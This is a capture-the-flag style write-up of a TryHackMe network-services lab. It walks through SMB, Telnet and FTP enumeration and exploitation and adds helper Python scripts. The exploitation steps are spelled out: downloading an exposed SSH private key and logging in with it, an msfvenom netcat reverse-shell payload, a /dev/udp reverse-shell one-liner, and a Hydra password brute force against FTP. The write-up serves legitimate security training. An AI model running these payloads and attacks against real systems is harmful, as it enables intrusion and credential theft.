=============================================
|    Nbtstat Information for 10.10.197.190    |
=============================================
Looking up status of 10.10.197.190
	POLOSMB         <00> -         B <ACTIVE>  Workstation Service
	POLOSMB         <03> -         B <ACTIVE>  Messenger Service
	POLOSMB         <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

======================================
|    Session Check on 10.10.197.190    |
======================================
[+] Server 10.10.197.190 allows sessions using username '', password ''

============================================
|    Getting domain SID for 10.10.197.190    |
============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

=======================================
|    OS information on 10.10.197.190    |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464.
[+] Got OS info for 10.10.197.190 from smbclient:
[+] Got OS info for 10.10.197.190 from srvinfo:
	POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

==========================================
|    Share Enumeration on 10.10.197.190    |
==========================================
WARNING: The "syslog" option is deprecated

	Sharename       Type      Comment
	---------       ----      -------
	netlogon        Disk      Network Logon Service
	profiles        Disk      Users profiles
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            POLOSMB

[+] Attempting to map shares on 10.10.197.190
//10.10.197.190/netlogon	[E] Can't understand response:
WARNING: The "syslog" option is deprecated
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.197.190/profiles	Mapping: OK, Listing: OK
//10.10.197.190/print$	Mapping: DENIED, Listing: N/A
//10.10.197.190/IPC$	[E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

========================================================================
|    Users on 10.10.197.190 via RID cycling (RIDS: 500-550,1000-1050)    |
========================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-434125608-3964652802-3194254534
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
What share sticks out as something we might want to investigate?
profiles. It is the only share that both maps and lists with a null session (Mapping: OK, Listing: OK), and its comment, "Users profiles", says it holds users' profile data, which is exactly the kind of content that leaks credentials and keys.
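The two signals worth pulling out of an enum4linux run like the one above are the null-session line and any share that reports Mapping: OK, Listing: OK, plus any local usernames the RID-cycling section turns up. The following parser is an added example written for this page, not part of enum4linux or the original writeup; the SAMPLE text is constructed from the output shown above (trimmed to the lines the parser needs), and the regexes assume enum4linux's usual "Mapping: X, Listing: Y" and "SID DOMAIN\name (kind)" formats.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: the session-check, share-mapping and RID-cycling lines from
# the enum4linux run above, trimmed to what the parser needs (not a full capture).
SAMPLE = """\
[+] Server 10.10.197.190 allows sessions using username '', password ''
[+] Attempting to map shares on 10.10.197.190
//10.10.197.190/netlogon\t[E] Can't understand response:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.197.190/profiles\tMapping: OK, Listing: OK
//10.10.197.190/print$\tMapping: DENIED, Listing: N/A
//10.10.197.190/IPC$\t[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-434125608-3964652802-3194254534
S-1-22-1-1000 Unix User\\cactus (Local User)
"""

NULL_SESSION = re.compile(r"allows sessions using username '', password ''")
# //host/share<ws>Mapping: OK|DENIED, Listing: OK|N/A|DENIED
SHARE_STATUS = re.compile(
    r"^//(?P<host>[^/\s]+)/(?P<share>\S+)\s+Mapping:\s*(?P<mapping>\w+),\s*Listing:\s*(?P<listing>[\w/]+)"
)
# S-1-22-1-1000 Unix User\cactus (Local User)
RID_USER = re.compile(
    r"^(?P<sid>S-1-[\d-]+)\s+(?P<domain>[^\\]+)\\(?P<name>\S+)\s+\((?P<kind>[^)]+)\)"
)


@dataclass
class Enum4linuxFindings:
    null_session: bool = False
    shares: dict = field(default_factory=dict)   # share name -> (mapping, listing)
    users: list = field(default_factory=list)    # account names from RID cycling


def parse_enum4linux(text: str) -> Enum4linuxFindings:
    """Walk enum4linux output line by line and collect the three findings above."""
    found = Enum4linuxFindings()
    for line in text.splitlines():
        if NULL_SESSION.search(line):
            found.null_session = True
            continue
        m = SHARE_STATUS.match(line)
        if m:
            found.shares[m["share"]] = (m["mapping"], m["listing"])
            continue
        m = RID_USER.match(line)
        if m and m["name"] not in found.users:
            found.users.append(m["name"])
    return found


def listable_anonymous_shares(found: Enum4linuxFindings) -> list:
    """Shares an unauthenticated client can both connect to and list.
    Only meaningful when the null session itself succeeded."""
    if not found.null_session:
        return []
    return sorted(name for name, (mapping, listing) in found.shares.items()
                  if mapping == "OK" and listing == "OK")


if __name__ == "__main__":
    f = parse_enum4linux(SAMPLE)
    print("null session:", f.null_session)
    print("anonymous, listable:", listable_anonymous_shares(f))
    print("usernames:", f.users)
```

Feed it the saved output of a full enum4linux run (enum4linux -a target > out.txt) and the usernames list doubles as the seed for later password attacks against SSH or FTP.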
4. Exploiting SMB
What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
Does the share allow anonymous access? Y/N?
smbclient //10.10.197.190/profiles -U Anonymous -p 445

Y
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
Here we cd into /tmp locally before connecting, so that the files we pull down land there.
smb: \> ls
  .                                   D        0  Tue Apr 21 12:08:23 2020
  ..                                  D        0  Tue Apr 21 11:49:56 2020
  .cache                             DH        0  Tue Apr 21 12:08:23 2020
  .profile                            H      807  Tue Apr 21 12:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 12:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 12:08:23 2020
  .viminfo                            H      947  Tue Apr 21 12:08:23 2020
  Working From Home Information.txt   N      358  Tue Apr 21 12:08:23 2020
  .ssh                               DH        0  Tue Apr 21 12:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 12:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 12:08:23 2020

		12316808 blocks of size 1024. 7583720 blocks available
"Working From Home Information.txt" is of interest. Note that the listing is a whole Linux home directory: .ssh (hidden, hence the H flag) may contain keys, and .sudo_as_admin_successful is created by Ubuntu's sudo the first time the user runs it, so this account has probably used sudo.
Trying

smb: \> get Working From Home Information.txt
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Working

fails: smbclient splits the argument on spaces and only asks the server for "\Working". Shell-style backslash escaping does not work here either, because inside smbclient the backslash is the SMB path separator. Double quotes are the option that works:

smb: \> get "Working From Home Information.txt"
getting file \Working From Home Information.txt of size 358 as Working From Home Information.txt (116.5 KiloBytes/sec) (average 116.5 KiloBytes/sec)
The file pulled down is now in /tmp as 'Working From Home Information.txt' and holds the following:

root@ip-10-10-73-253:/tmp# cat Working\ From\ Home\ Information.txt
John Cactus,
As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever possible, employees should work from home. As such- your account has now been enabled with ssh access to the main server.
If there are any problems, please contact the IT department at it@polointernalcoms.uk
Regards,
James Department Manager
This profile folder likely belongs to John Cactus.
What service has been configured to allow him to work from home?
ssh
Okay! Now we know this, what directory on the share should we look in?
.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa. This is the private key used for SSH authentication: whoever holds it can log in wherever the matching public key is listed in authorized_keys, which is why a private key sitting on a share readable over a null session is a serious finding.
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]". Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. What is the smb.txt flag?
There are multiple ways to discover the account username:
1. Recalling the enum4linux results, which contained: S-1-22-1-1000 Unix User\cactus (Local User)
2. (The one I used.) Download the id_rsa.pub file; these usually include more information. In this case the file has the following ending: cactus@polosmb
The following ssh command gets you into the server as that user:

ssh -i id_rsa cactus@10.10.197.190

At this point you can cat the flag.
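Two small checks cover what the steps above do by hand: read the username out of the public key's comment, and make sure the private key's permissions are tight enough for the OpenSSH client, which refuses a key file that group or others can read. This is an added example for this page, not the writeup author's code; SAMPLE_PUBKEY is a constructed placeholder (its key material is junk, only the "type base64 comment" shape and the cactus@polosmb comment matter), and the permission check mirrors the mode test ssh applies rather than calling ssh itself.

```python
import os
import stat
import tempfile

# Constructed placeholder public key: NOT a real key. Only the three-field layout
# and the trailing comment (as seen in the downloaded id_rsa.pub) are relevant.
SAMPLE_PUBKEY = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDexample cactus@polosmb\n"


def key_comment(pubkey_line: str) -> str:
    """Trailing comment of an OpenSSH public-key line ('' if the line has none)."""
    parts = pubkey_line.strip().split(None, 2)   # type, base64 blob, comment
    return parts[2] if len(parts) == 3 else ""


def user_from_comment(comment: str) -> str:
    """ssh-keygen writes 'user@host' as the default comment; return the user part."""
    return comment.split("@", 1)[0] if "@" in comment else ""


def private_key_mode_ok(path: str) -> bool:
    """True when no group/other bits are set: the mode test the OpenSSH client
    applies before it will load a private key ('Permissions 0644 ... are too open')."""
    return (stat.S_IMODE(os.stat(path).st_mode) & 0o077) == 0


def secure_private_key(path: str) -> bool:
    """Equivalent of 'chmod 600 id_rsa'; returns the result of the post-change check."""
    os.chmod(path, 0o600)
    return private_key_mode_ok(path)


def demo_permissions():
    """Create a scratch file the way a download usually lands (0644), then fix it.
    Returns (check_before, check_after)."""
    fd, path = tempfile.mkstemp(prefix="id_rsa_demo_")
    os.close(fd)
    os.chmod(path, 0o644)            # simulate a freshly downloaded key
    before = private_key_mode_ok(path)
    after = secure_private_key(path)
    os.unlink(path)
    return before, after


if __name__ == "__main__":
    print("user from id_rsa.pub comment:", user_from_comment(key_comment(SAMPLE_PUBKEY)))
    print("mode ok before/after chmod 600:", demo_permissions())
```

The comment is only a hint, not proof: ssh-keygen fills it in from whoever generated the key, so confirm it against an independent source such as the RID-cycling result above before relying on it.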
5. Understanding Telnet
What is Telnet?
an application protocol
What has slowly replaced Telnet?
ssh
How to connect to a Telnet Server with IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
The lack of what, means that all Telnet communication is in plaintext?
encryption
6. Enumerating Telnet
How many ports are open on the target machine?
nmap 10.10.234.233
This results in no open ports; I need to figure out how to look at more ports.
nmap -p 1-10000 10.10.234.233
Scanning more ports displays one open port:
Starting Nmap 7.60 ( https://nmap.org ) at 2022-09-19 04:42 BST
Nmap scan report for ip-10-10-113-139.eu-west-1.compute.internal (10.10.113.139)
Host is up (0.00076s latency).
Not shown: 9999 closed ports
PORT     STATE SERVICE
8012/tcp open  unknown
MAC Address: 02:BD:A8:4A:74:A5 (Unknown)
What port is this?
8012
This port is unassigned, but still lists the protocol it's using, what protocol is this?
tcp
Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
Running without -p- (nmap's default is its top 1000 most common ports, which does not include 8012) results in this port not being found, so no ports show up as open.
Thanks to the way this question is worded, I reran the nmap scan to see what the results become and get a better idea of what the following statement means.
Trying to understand what this means, I looked it up and found the following:
To scan all ports (1 - 65535): nmap -p- 192.168.0.1
in: https://phoenixnap.com/kb/nmap-scan-open-ports. This -p- is obviously more likely to find open ports, but it takes much longer: the 1-10000 scan took 5:34 while the -p- scan seems on course for 45 minutes. Useful during an actual attack, not something I plan on doing too much during labs. Extra slow due to stealth scan capabilities.
Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.
Based on the title returned to us, what do we think this port could be used for?
a backdoor
What does this mean? How do I get a title? What does * ******* mean? I'm going to try enum4linux on it and see how that goes, since I need a title and something to enumerate possible processes happening on the port. I got nothing useful.
I ended up googling for port 8012 and found https://kb.eventtracker.com/evtpass/evtPages/PortNo_8012_PTAKKS_59256.asp. It mentions PTAKKS, a backdoor that uses TCP 8012.
With a little more googling I found the following. I was trying to figure out how to check for services running on open ports, and knew there was a way but forgot how. https://subscription.packtpub.com/book/networking-&-servers/9781784392918/2/ch02lvl1sec18/scanning-and-identifying-services-with-nmap Here they mention:
nmap -p 8012 -sV -O 10.10.113.139
We modify it with the appropriate IP and try again later, since my 2 hours on the machine ran out.
The result is:
PORT     STATE SERVICE VERSION
8012/tcp open  unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8012-TCP:V=7.60%I=7%D=9/20%Time=632912DF%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20command
SF:s\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\
SF:x20view\x20commands\n")%
....
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%)
Now, with much better information thanks to -sV (the service sent its banner in reply to both of nmap's NULL and GenericLines probes, as the r(NULL,...) and r(GenericLines,...) entries in the fingerprint show), we can see that "a backdoor" was a pretty simple answer.
Who could it belong to? Gathering possible usernames is an important step in enumeration.
SKIDY. This was deduced from the line "SKIDY'S\x20BACKDOOR" (\x20 is how the fingerprint encodes a space).
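What -sV did here can be reproduced with a bare socket: connect, send nothing (nmap's NULL probe), and read whatever the service volunteers, then pull a candidate username out of the banner. The code below is an added example for this page, not the writeup's or nmap's code. It assumes the banner format seen above ("<NAME>'S BACKDOOR ...") for the owner heuristic, and the demo() function starts a tiny constructed mock on 127.0.0.1 that replays that banner so the example runs without the lab machine.

```python
import re
import socket
import threading

# The banner returned by the lab service, as reported in the nmap fingerprint above.
# Replayed by the constructed mock server below so the example runs offline.
BANNER = b"SKIDY'S BACKDOOR. Type .HELP to view commands\n"


def grab_banner(host: str, port: int, timeout: float = 3.0) -> str:
    """NULL-probe style banner grab: connect, send nothing, read up to the first
    newline or until the peer closes/goes quiet."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
                if b"\n" in data:
                    break
        except socket.timeout:
            pass                      # silent service: return what we have (maybe nothing)
    return b"".join(chunks).decode("utf-8", "replace").strip()


# Heuristic for banners of the form "<NAME>'S <something>": the possessive is a
# name worth recording for later username attacks. Assumed format, not a standard.
OWNER = re.compile(r"\b([A-Za-z0-9_]+)'S\b", re.IGNORECASE)


def possible_owner(banner: str):
    """Return the name before a possessive 'S in the banner, or None."""
    m = OWNER.search(banner)
    return m.group(1) if m else None


def _mock_backdoor(ready: threading.Event, port_box: list) -> None:
    """Constructed stand-in for the lab service: accept one client, send BANNER, close."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))        # ephemeral port, reported through port_box
    srv.listen(1)
    port_box.append(srv.getsockname()[1])
    ready.set()
    conn, _ = srv.accept()
    conn.sendall(BANNER)
    conn.close()
    srv.close()


def demo():
    """Run the mock, grab its banner, and return (banner, possible_owner)."""
    ready, port_box = threading.Event(), []
    t = threading.Thread(target=_mock_backdoor, args=(ready, port_box), daemon=True)
    t.start()
    ready.wait(2)
    banner = grab_banner("127.0.0.1", port_box[0])
    t.join(2)
    return banner, possible_owner(banner)


if __name__ == "__main__":
    print(demo())
```

Against the real target you would call grab_banner("10.10.211.129", 8012) directly; the point of the loop's timeout branch is that many services say nothing until the client speaks, which is why nmap follows the NULL probe with GenericLines and others.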
7. Exploiting Telnet
Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.
telnet 10.10.211.129 8012
root@ip-10-10-10-29:~# telnet 10.10.211.129 8012
Trying 10.10.211.129...
Connected to 10.10.211.129.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
Great! It's an open telnet connection! What welcome message do we receive?
SKIDY'S BACKDOOR.
Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
N. As of right now I have not successfully got a response to any input other than .HELP,
which results in:

.HELP
.HELP: View commands
.RUN <command>: Execute commands
.EXIT: Exit

Now, .RUN doesn't show any results. We might be able to believe that they are being run elsewhere, but I'll move forward in the lab.
Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.
run: sudo tcpdump ip proto \\icmp -i eth0
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
Your local IP is seen in the prompt root@ip-10-10-10-29:. I messed up here and just ran ping ip.
When you don't have console access, this might lock you out of the terminal for good, on top of being super noisy. Good thing that for this lab I can turn the victim box off and on, which at least on my side gets rid of the issue. I don't know exactly how TryHackMe shuts down unused systems. Is it a VM that gets reset or saved at some point? These are questions I will likely never know the answer to. Granted, since the ping stopped I'm fairly confident the machine turned off.
I highly recommend writing the command separately and pasting it in. I managed to lock myself out of the telnet session twice; I kept getting exited after typing in the IP.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.10.29 lport=4444 R
I know there are a couple of different ways to do reverse shells, my favourite being through /dev/udp as shown in https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1
Listener: nc -u -lvp 4242

I did not know that msfvenom existed, but a tool that builds payloads according to different parameters is beautiful.

[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 90 bytes
mkfifo /tmp/nvti; nc 10.10.10.29 4444 0</tmp/nvti | /bin/sh >/tmp/nvti 2>&1; rm /tmp/nvti
What word does the generated payload start with?
mkfifo. The payload creates a named pipe (/tmp/nvti), runs nc against our listener with the pipe as its stdin, pipes everything nc receives into /bin/sh, and sends the shell's stdout and stderr back into the pipe so they travel out over the same connection; the pipe is removed once the connection closes.
Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:
"nc -lvp [listening port]"
What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!
Success! What is the contents of flag.txt?
At this point you can cat flag.txt and be done with task 7.
8. Understanding FTP
What communications model does FTP use?
client-server
What's the standard FTP port?
A quick Google search finds port 21.
How many modes of FTP connection are there?
2: active and passive.
9. Enumerating FTP
Run an nmap scan of your choice. How many ports are open on the target machine?
nmap -p 1-10000 10.10.168.84
The first result allows us to move forward:

Not shown: 9999 closed ports
PORT   STATE SERVICE
21/tcp open  ftp

I ran one with only the first 1-10000 ports and only found one port. Now I'm running something faster:
nmap -p- -sS 10.10.168.84
I changed it again due to the slow scan; obviously not recommended outside of laboratory scenarios:
nmap -p- -T 5 10.10.168.84

Not shown: 65533 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
80/tcp open  http
MAC Address: 02:42:E7:21:CB:93 (Unknown)

Wow, I just waited for a full scan because the first one missed port 80. Oh man.
2
What port is ftp running on?
21
What variant of FTP is running on it?
Using the previous nmap command that enumerates service versions, we will hopefully be able to find the FTP variant:
nmap -p 21 -sV -O 10.10.168.84
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
MAC Address: 02:42:E7:21:CB:93 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.13 (96%), Linux 3.8 (96%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 (92%), Linux 3.19 (92%), Linux 3.2 - 4.8 (92%), Linux 3.4 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: Welcome
vsftpd 2.0.8 or later
Great, now we know what type of FTP server we're dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing "ftp [IP]" into the console, and entering "anonymous", and no password when prompted. What is the name of the file in the anonymous FTP directory?
For this part we likely want to pull the file down; to do this we use the get command. I also moved to the /tmp folder first.

root@ip-10-10-10-29:~# cd /tmp/
root@ip-10-10-10-29:/tmp# ftp 10.10.168.84
Connected to 10.10.168.84.
220 Welcome to the administrator FTP service.
Name (10.10.168.84:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> get PUBLIC_NOTICE.txt
local: PUBLIC_NOTICE.txt remote: PUBLIC_NOTICE.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for PUBLIC_NOTICE.txt (353 bytes).
226 Transfer complete.
353 bytes received in 0.00 secs (202.6611 kB/s)

===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================
Hello,
I hope everyone is aware that the FTP server will not be available over the weekend- we will be carrying out routine system maintenance. Backups will be made to my account so I reccomend encrypting any sensitive data.
Cheers,
Mike
Great! Now we've got details about the FTP server and, crucially, a possible username. Let's see what we can do with that...
Using the technique from the exploit-db entry below (an FTP account-enumeration trick: send CWD ~user before logging in and see whether the reply differs for real and bogus users), we can try the following:
https://www.exploit-db.com/exploits/20745

root@ip-10-10-10-29:/tmp# nc 10.10.168.84 21
220 Welcome to the administrator FTP service.
cwd ~mike
530 Please login with USER and PASS.

This vsftpd refuses CWD before authentication, so the reply neither confirms nor denies that mike exists. To verify that the mike account exists, log in as mike:

root@ip-10-10-10-29:/tmp# ftp 10.10.168.84
Connected to 10.10.168.84.
220 Welcome to the administrator FTP service.
Name (10.10.168.84:root): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 24  2020 ftp
-rwxrwxrwx    1 0        0              26 Apr 24  2020 ftp.txt
226 Directory send OK.
ftp> get ftp.txt
local: ftp.txt remote: ftp.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp.txt (26 bytes).
226 Transfer complete.

In this scenario I just guessed a password and was correct, at which point I was able to read the flag in ftp.txt and solve all of task 10. I will still follow through and document that task.
10. Exploiting FTP
What is the password for the user "mike"?
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.168.84 ftp
[21][ftp] host: 10.10.168.84   login: mike   password: ********
[STATUS] attack finished for 10.10.168.84 (waiting for children to complete tests)
Bingo! Now, let's connect to the FTP server as this user using "ftp [IP]" and entering the credentials when prompted
Name (10.10.168.84:root): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxrwxrwx    2 0        0            4096 Apr 24  2020 ftp
-rwxrwxrwx    1 0        0              26 Apr 24  2020 ftp.txt
226 Directory send OK.
ftp> get ftp.txt
local: ftp.txt remote: ftp.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ftp.txt (26 bytes).
226 Transfer complete.
What is ftp.txt?
cat ftp.txt
Writeups should have a link to TryHackMe and not include any passwords, cracked hashes or flags: https://tryhackme.com/room/networkservicesFreorererererere